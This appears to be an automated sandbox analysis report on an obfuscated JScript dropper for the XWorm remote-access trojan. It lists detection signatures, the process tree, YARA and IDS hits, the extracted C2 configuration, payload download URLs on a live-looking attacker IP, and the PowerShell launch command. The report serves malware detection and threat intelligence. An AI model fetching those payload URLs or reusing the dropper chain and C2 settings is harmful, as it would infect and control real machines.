Edit tour

Windows Analysis Report
obfuscated (1).js

Overview

General Information

Sample name:obfuscated (1).js
Analysis ID:1643093
MD5:b361b76556d7d6120193ebad93c39820
SHA1:6103ae7cea2892ebe20e1c3fde9c8b95313b1e8e
SHA256:1d7e4c2ea862244bdc81943bdb7c4993b811854e0bf3628f5f3d89d85ba67e03
Tags:176-65-144-3jsuser-JAMESWT_MHT
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
JScript performs obfuscated calls to suspicious functions
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Contains functionality to log keystrokes (.Net Source)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
JavaScript source code contains functionality to generate code involving HTTP requests or file downloads
JavaScript source code contains functionality to generate code involving a shell, file or stream
PE file contains section with special chars
PE file has nameless sections
Potential obfuscated javascript found
Powershell drops PE file
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Script Initiated Connection
Sigma detected: Startup Folder File Write
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • wscript.exe (PID: 7740 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\obfuscated (1).js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 3904 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\WTRTRWFSHS.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • JXCJKXCJHKJHXCJHKXCXCJHK.exe (PID: 5704 cmdline: "C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe" MD5: 2FDE7F3FFB6B753F4F38D56D9B5A7CC6)
        • JXCJKXCJHKJHXCJHKXCXCJHK.exe (PID: 7988 cmdline: "C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe" MD5: 2FDE7F3FFB6B753F4F38D56D9B5A7CC6)
  • cleanup
{
  "C2 url": [
    "178.173.236.10"
  ],
  "Port": 7000,
  "Aes key": "<123456789>",
  "SPL": "<Xwormmm>",
  "Install file": "USB.exe",
  "Version": "XWorm V5.2"
}
SourceRuleDescriptionAuthorStrings
0000000A.00000002.1333571921.0000000002ACE000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
    0000000A.00000002.1333571921.0000000002ACE000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0x8eff:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x13e0f:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x8f9c:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x13eac:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x90b1:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x13fc1:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x8a91:$cnc4: POST / HTTP/1.1
    • 0x139a1:$cnc4: POST / HTTP/1.1
    0000000C.00000002.2457857484.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
      0000000C.00000002.2457857484.0000000000402000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0x888b:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x8928:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x8a3d:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x841d:$cnc4: POST / HTTP/1.1
      0000000A.00000002.1333571921.0000000002AB5000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
        Click to see the 4 entries
        SourceRuleDescriptionAuthorStrings
        12.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
          12.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.unpackrat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
          • 0x7075:$str01: $VB$Local_Port
          • 0x7066:$str02: $VB$Local_Host
          • 0x7334:$str03: get_Jpeg
          • 0x6d53:$str04: get_ServicePack
          • 0x8093:$str05: Select * from AntivirusProduct
          • 0x828f:$str06: PCRestart
          • 0x82a3:$str07: shutdown.exe /f /r /t 0
          • 0x8355:$str08: StopReport
          • 0x832b:$str09: StopDDos
          • 0x842d:$str10: sendPlugin
          • 0x85d9:$str12: -ExecutionPolicy Bypass -File "
          • 0x8702:$str13: Content-length: 5235
          12.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0x8a8b:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x8b28:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x8c3d:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0x861d:$cnc4: POST / HTTP/1.1
          10.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.2ab9f3c.2.unpackJoeSecurity_XWormYara detected XWormJoe Security
            10.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.2ab9f3c.2.unpackrat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
            • 0x5275:$str01: $VB$Local_Port
            • 0x5266:$str02: $VB$Local_Host
            • 0x5534:$str03: get_Jpeg
            • 0x4f53:$str04: get_ServicePack
            • 0x6293:$str05: Select * from AntivirusProduct
            • 0x648f:$str06: PCRestart
            • 0x64a3:$str07: shutdown.exe /f /r /t 0
            • 0x6555:$str08: StopReport
            • 0x652b:$str09: StopDDos
            • 0x662d:$str10: sendPlugin
            • 0x67d9:$str12: -ExecutionPolicy Bypass -File "
            • 0x6902:$str13: Content-length: 5235
            • 0x930d:$str13: Content-length: 5235
            Click to see the 13 entries

            System Summary

            barindex
            Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 176.65.144.3, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 7740, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49713
            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\obfuscated (1).js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\obfuscated (1).js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3964, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\obfuscated (1).js", ProcessId: 7740, ProcessName: wscript.exe
            Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 176.65.144.3, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 7740, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49713
            Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe, ProcessId: 7988, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\X1Client.lnk
            Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\obfuscated (1).js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\obfuscated (1).js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3964, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\obfuscated (1).js", ProcessId: 7740, ProcessName: wscript.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\WTRTRWFSHS.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\WTRTRWFSHS.ps1", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\obfuscated (1).js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7740, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\WTRTRWFSHS.ps1", ProcessId: 3904, ProcessName: powershell.exe
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-19T14:19:22.506333+010020188561A Network Trojan was detected176.65.144.380192.168.2.449713TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-19T14:20:42.005149+010028559241Malware Command and Control Activity Detected192.168.2.449732178.173.236.107000TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: http://176.65.144.3/dev/BRAINN.exeAvira URL Cloud: Label: malware
            Source: http://176.65.144.3/dev/BRAINNN.ps1Avira URL Cloud: Label: malware
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeAvira: detection malicious, Label: TR/AVI.Agent.aebha
            Source: C:\Users\user\AppData\Local\Temp\X1Client.exeAvira: detection malicious, Label: TR/AVI.Agent.aebha
            Source: 0000000A.00000002.1333571921.0000000002ACE000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["178.173.236.10"], "Port": 7000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.2"}
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeReversingLabs: Detection: 54%
            Source: C:\Users\user\AppData\Local\Temp\X1Client.exeReversingLabs: Detection: 54%
            Source: obfuscated (1).jsVirustotal: Detection: 20%Perma Link
            Source: obfuscated (1).jsReversingLabs: Detection: 26%
            Source: 0000000A.00000002.1333571921.0000000002ACE000.00000004.00000800.00020000.00000000.sdmpString decryptor: 178.173.236.10
            Source: 0000000A.00000002.1333571921.0000000002ACE000.00000004.00000800.00020000.00000000.sdmpString decryptor: 7000
            Source: 0000000A.00000002.1333571921.0000000002ACE000.00000004.00000800.00020000.00000000.sdmpString decryptor: <123456789>
            Source: 0000000A.00000002.1333571921.0000000002ACE000.00000004.00000800.00020000.00000000.sdmpString decryptor: <Xwormmm>
            Source: 0000000A.00000002.1333571921.0000000002ACE000.00000004.00000800.00020000.00000000.sdmpString decryptor: XWorm V5.2
            Source: 0000000A.00000002.1333571921.0000000002ACE000.00000004.00000800.00020000.00000000.sdmpString decryptor: USB.exe
            Source: 0000000A.00000002.1333571921.0000000002ACE000.00000004.00000800.00020000.00000000.sdmpString decryptor: %Temp%
            Source: 0000000A.00000002.1333571921.0000000002ACE000.00000004.00000800.00020000.00000000.sdmpString decryptor: X1Client.exe
            Source: Binary string: CXZfASD.pdbTFnF source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 0000000A.00000000.1314968452.0000000000752000.00000002.00000001.01000000.0000000A.sdmp, JXCJKXCJHKJHXCJHKXCXCJHK.exe.8.dr, X1Client.exe.12.dr
            Source: Binary string: CXZfASD.pdb source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 0000000A.00000000.1314968452.0000000000752000.00000002.00000001.01000000.0000000A.sdmp, JXCJKXCJHKJHXCJHKXCXCJHK.exe.8.dr, X1Client.exe.12.dr
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeFile opened: C:\Users\user\AppData\LocalJump to behavior

            Software Vulnerabilities

            barindex
            Source: obfuscated (1).jsReturn value : ['"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "']Go to definition
            Source: obfuscated (1).jsReturn value : ['"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "']Go to definition
            Source: obfuscated (1).jsReturn value : ['"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "']Go to definition
            Source: obfuscated (1).jsReturn value : ['"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "']Go to definition
            Source: obfuscated (1).jsArgument value : ['"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\\Temp\\WTRTRWFSHS.ps1"",0,true', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "']Go to definition
            Source: obfuscated (1).jsReturn value : ['"WScript.Shell"', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\\Temp\\WTRTRWFSHS.ps1"",0,true', '"Scripting.FileSystemObject"', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "']Go to definition
            Source: obfuscated (1).jsReturn value : ['"WScript.Shell"', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\\Temp\\WTRTRWFSHS.ps1"",0,true', '"Scripting.FileSystemObject"', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "']Go to definition
            Source: obfuscated (1).jsReturn value : ['"WScript.Shell"', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\\Temp\\WTRTRWFSHS.ps1"",0,true', '"Scripting.FileSystemObject"', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "']Go to definition
            Source: obfuscated (1).jsReturn value : ['"WScript.Shell"', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\\Temp\\WTRTRWFSHS.ps1"",0,true', '"Scripting.FileSystemObject"', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "']Go to definition
            Source: obfuscated (1).jsReturn value : ['"WScript.Shell"', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\\Temp\\WTRTRWFSHS.ps1"",0,true', '"Scripting.FileSystemObject"', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "']Go to definition
            Source: obfuscated (1).jsReturn value : ['"WScript.Shell"', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\\Temp\\WTRTRWFSHS.ps1"",0,true', '"Scripting.FileSystemObject"', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "']Go to definition
            Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeCode function: 4x nop then jmp 01094DD9h10_2_01094C98

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49732 -> 178.173.236.10:7000
            Source: Network trafficSuricata IDS: 2018856 - Severity 1 - ET MALWARE Windows executable base64 encoded : 176.65.144.3:80 -> 192.168.2.4:49713
            Source: C:\Windows\System32\wscript.exeNetwork Connect: 176.65.144.3 80Jump to behavior
            Source: Malware configuration extractorURLs: 178.173.236.10
            Source: obfuscated (1).jsArgument value : ['"http://176.65.144.3/dev/BRAINNN.ps1","C:\\Temp\\WTRTRWFSHS.ps1"']Go to definition
            Source: obfuscated (1).jsReturn value : ['"http://176.65.144.3/dev/BRAINNN.ps1"', '"MSXML2.XMLHTTP"']Go to definition
            Source: obfuscated (1).jsReturn value : ['"http://176.65.144.3/dev/BRAINNN.ps1"', '"MSXML2.XMLHTTP"']Go to definition
            Source: obfuscated (1).jsArgument value : ['"http://176.65.144.3/dev/BRAINNN.ps1","C:\\Temp\\WTRTRWFSHS.ps1"']Go to definition
            Source: obfuscated (1).jsArgument value : ['"GET","http://176.65.144.3/dev/BRAINNN.ps1",false']Go to definition
            Source: obfuscated (1).jsReturn value : ['"http://176.65.144.3/dev/BRAINNN.ps1"', '"MSXML2.XMLHTTP"']Go to definition
            Source: obfuscated (1).jsReturn value : ['"http://176.65.144.3/dev/BRAINNN.ps1"', '"MSXML2.XMLHTTP"']Go to definition
            Source: obfuscated (1).jsReturn value : ['"http://176.65.144.3/dev/BRAINNN.ps1"', '"MSXML2.XMLHTTP"']Go to definition
            Source: obfuscated (1).jsReturn value : ['"http://176.65.144.3/dev/BRAINNN.ps1"', '"MSXML2.XMLHTTP"']Go to definition
            Source: global trafficTCP traffic: 192.168.2.4:49722 -> 178.173.236.10:7000
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 19 Mar 2025 13:19:28 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Last-Modified: Wed, 12 Mar 2025 20:43:35 GMTETag: "a200-6302b42599ee1"Accept-Ranges: bytesContent-Length: 41472Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f6 f1 d1 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 98 00 00 00 08 00 00 00 00 00 00 fe b6 00 00 00 20 00 00 00 c0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 01 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a8 b6 00 00 53 00 00 00 00 c0 00 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 04 97 00 00 00 20 00 00 00 98 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 e0 04 00 00 00 c0 00 00 00 06 00 00 00 9a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 00 00 00 02 00 00 00 a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 b6 00 00 00 00 00 00 48 00 00 00 02 00 05 00 c8 5b 00 00 e0 5a 00 00 01 00 00 00 14 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 01 00 00 0a 2a 1e 02 28 04 00 00 0a 2a a6 73 06 00 00 0a 80 01 00 00 04 73 07 00 00 0a 80 02 00 00 04 73 08 00 00 0a 80 03 00 00 04 73 09 00 00 0a 80 04 00 00 04 2a 00 00 13 30 01 00 0f 00 00 00 01 00 00 11 7e 01 00 00 04 6f 0a 00 00 0a 0a 2b 00 06 2a 00 13 30 01 00 0f 00 00 00 02 00 00 11 7e 02 00 00 04 6f 0b 00 00 0a 0a 2b 00 06 2a 00 13 30 01 00 0f 00 00 00 03 00 00 11 7e 03 00 00 04 6f 0c 00 00 0a 0a 2b 00 06 2a 00 13 30 01 00 0f 00 00 00 04 00 00 11 7e 04 00 00 04 6f 0d 00 00 0a 0a 2b 00 06 2a 00 13 30 02 00 11 00 00 00 05 00 00 11 02 03 28 11 00 00 0a 28 12 00 00 0a 0a 2b 00 06 2a 00 00 00 13 30 01 00 0b 00 00 00 06 00 00 11 02 28 13 00 00 0a 0a 2b 00 06 2a 00 13 30 01 00 0f 00 00 00 07 00 00 11 d0 05 00 00 02 28 14 00 00 0a 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 08 00 00 11 02 28 15 00 00 0a 0a 2b 00 06 2a 00 13 30 01 00 18 00 00 00 09 00 00 11 02 8c 01 00 0
            Source: global trafficHTTP traffic detected: GET /dev/BRAINN.exe HTTP/1.1Host: 176.65.144.3Connection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 176.65.144.3 176.65.144.3
            Source: Joe Sandbox ViewASN Name: AS45671-NET-AUWholesaleServicesProviderAU AS45671-NET-AUWholesaleServicesProviderAU
            Source: Joe Sandbox ViewASN Name: PALTEL-ASPALTELAutonomousSystemPS PALTEL-ASPALTELAutonomousSystemPS
            Source: global trafficHTTP traffic detected: GET /dev/BRAINNN.ps1 HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 176.65.144.3Connection: Keep-Alive
            Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
            Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
            Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
            Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
            Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
            Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
            Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
            Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
            Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
            Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
            Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
            Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
            Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
            Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
            Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
            Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
            Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
            Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
            Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
            Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
            Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
            Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
            Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
            Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
            Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
            Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
            Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
            Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
            Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
            Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
            Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
            Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
            Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
            Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
            Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
            Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
            Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
            Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
            Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
            Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
            Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
            Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
            Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
            Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
            Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
            Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
            Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
            Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
            Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
            Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
